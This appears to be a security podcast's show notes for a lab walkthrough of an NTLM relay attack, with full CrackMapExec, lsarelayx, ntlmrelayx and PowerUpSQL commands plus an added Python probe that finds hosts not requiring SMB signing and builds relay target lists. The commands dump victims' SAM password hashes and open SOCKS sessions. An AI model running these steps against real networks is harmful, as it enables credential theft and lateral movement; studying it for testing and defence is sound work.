
7 Minute Security


May 5, 2023

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In today's episode we staged an NTLM relay attack using a vulnerable SQL server.

First we used CrackMapExec (see our two-part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts that do not require SMB signing, which is what makes them viable relay targets:

    cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt

Then we set up lsarelayx in one window. lsarelayx runs (as a local admin) on a Windows host we control, hooks LSA so that NTLM authentications arriving at that host are captured system-wide, and forwards them to the ntlmrelayx instance named by --host:

    lsarelayx --host=localhost

And in a second window we ran ntlmrelayx.py. It gets --no-smb-server because lsarelayx, not ntlmrelayx, is the listener catching the incoming authentication. Pick a VICTIM from the relay list that is not the SQL server itself: Windows has refused NTLM authentication relayed back to the machine it came from since MS08-068.

    python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM

Finally, in a third window we triggered authentication from the vulnerable SQL server with PowerUpSQL's Invoke-SQLUncPathInjection, which feeds a UNC path pointing at our capture host to stored procedures such as xp_dirtree so that the SQL Server service account authenticates to it (the -captureip address is the host running lsarelayx):

    Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS

Boom! Watch the local usernames and hashes fall out of the victim system. (ntlmrelayx's default SMB action dumps the target's SAM, so this only works when the relayed SQL service account is a local administrator on VICTIM.)

We also tried a multi-relay scenario with a list of victim hosts in a targets.txt file, one per line:

    victim1
    victim2
    victim3

Then we tweaked the ntlmrelayx command slightly:

    python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt

Interestingly(?) only victim2 was attacked.
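As an added example (not from the 7MS post, and not CrackMapExec's or impacket's own code), here is a small Python probe that does at the protocol level what --gen-relay-list relies on: send an SMB2 NEGOTIATE and read the SecurityMode flags in the response. Only servers that do not *require* signing are viable relay targets; "signing enabled" alone does not protect a host. It then writes the target list in the smb://host form that ntlmrelayx -tf accepts, dropping the SQL server whose authentication you are triggering, because Windows refuses NTLM relayed back to its origin (MS08-068). The hostnames and the canned response bytes are constructed for the offline demo; probe_smb_signing() is the live variant.

```python
"""SMB2 signing probe and relay-list builder (added example; all data constructed)."""
import socket
import struct

# MS-SMB2 2.2.4: SecurityMode flags in the NEGOTIATE response
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_HEADER_FMT = "<4sHHIHHIIQIIQ16s"  # 64-byte SMB2 header


def build_negotiate_request(dialects=(0x0202, 0x0210)) -> bytes:
    """Minimal SMB2 NEGOTIATE request in a NetBIOS session wrapper. We offer
    signing-enabled-but-not-required, which is what a default client sends."""
    header = struct.pack(SMB2_HEADER_FMT, b"\xfeSMB", 64, 0, 0, SMB2_NEGOTIATE,
                         1, 0, 0, 0, 0, 0, 0, b"\x00" * 16)
    # StructureSize, DialectCount, SecurityMode, Reserved, Capabilities,
    # ClientGuid, ClientStartTime, then the dialect list
    body = struct.pack("<HHHHI16sQ", 36, len(dialects),
                       SMB2_NEGOTIATE_SIGNING_ENABLED, 0, 0, b"\x00" * 16, 0)
    body += b"".join(struct.pack("<H", d) for d in dialects)
    msg = header + body
    return struct.pack(">I", len(msg)) + msg  # 0x00 type byte + 3-byte length


def parse_negotiate_response(raw: bytes) -> dict:
    """Return dialect and signing flags from an SMB2 NEGOTIATE response
    (NetBIOS session header already stripped)."""
    if len(raw) < SMB2_HEADER_LEN + 4 or raw[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    status, command = struct.unpack_from("<IH", raw, 8)
    if command != SMB2_NEGOTIATE:
        raise ValueError(f"unexpected SMB2 command 0x{command:04x}")
    if status != 0:
        raise ValueError(f"NEGOTIATE failed, NTSTATUS 0x{status:08x}")
    structure_size, security_mode, dialect = struct.unpack_from(
        "<HHH", raw, SMB2_HEADER_LEN)
    if structure_size != 65:
        raise ValueError("malformed NEGOTIATE response")
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf


def probe_smb_signing(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Live check of one host (needs network; the offline demo below does not)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        length = struct.unpack(">I", _recv_exact(s, 4))[0] & 0x00FFFFFF
        return parse_negotiate_response(_recv_exact(s, length))


def relay_targets(results: dict, exclude=frozenset()) -> list:
    """Turn {host: parsed_response} into ntlmrelayx -tf lines. Hosts that
    require signing cannot be relayed to; the host whose authentication you
    trigger (here the SQL server) is dropped because Windows has refused NTLM
    relayed back to the originating machine since MS08-068."""
    return [f"smb://{host}" for host, info in sorted(results.items())
            if not info["signing_required"] and host not in exclude]


def fake_negotiate_response(security_mode: int, dialect: int = 0x0210) -> bytes:
    """Constructed NEGOTIATE response (no real server involved) so the parser
    can be exercised offline. Flags=0x1 marks it as server-to-client."""
    header = struct.pack(SMB2_HEADER_FMT, b"\xfeSMB", 64, 0, 0, SMB2_NEGOTIATE,
                         1, 0x1, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       b"\x00" * 16, 0, 0x800000, 0x800000, 0x800000, 0, 0,
                       128, 0, 0)
    return header + body


if __name__ == "__main__":
    # Offline demo with constructed hosts; swap fake_negotiate_response() for
    # probe_smb_signing(host) to sweep a real subnet.
    sample = {
        "sqlsrv01": parse_negotiate_response(fake_negotiate_response(0x01)),
        "victim1": parse_negotiate_response(fake_negotiate_response(0x01)),
        "victim2": parse_negotiate_response(fake_negotiate_response(0x03)),
        "victim3": parse_negotiate_response(fake_negotiate_response(0x01)),
    }
    for line in relay_targets(sample, exclude={"sqlsrv01"}):
        print(line)  # smb://victim1, smb://victim3 (victim2 requires signing)
```

Redirect the output of relay_targets() to targets.txt and hand it to ntlmrelayx with -tf; the explicit smb:// prefix leaves no ambiguity about which protocol each target gets.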

Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay:

    python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks

Interestingly(?) we got a low-priv user to relay and set up a SOCKS connection, but not the domain admin configured on the SQL server.

TLDR/TLDL: relaying credentials to a single victim with ntlmrelayx on a Windows host seems to work great! Your mileage may vary if you try to pull off more advanced tricks with ntlmrelayx.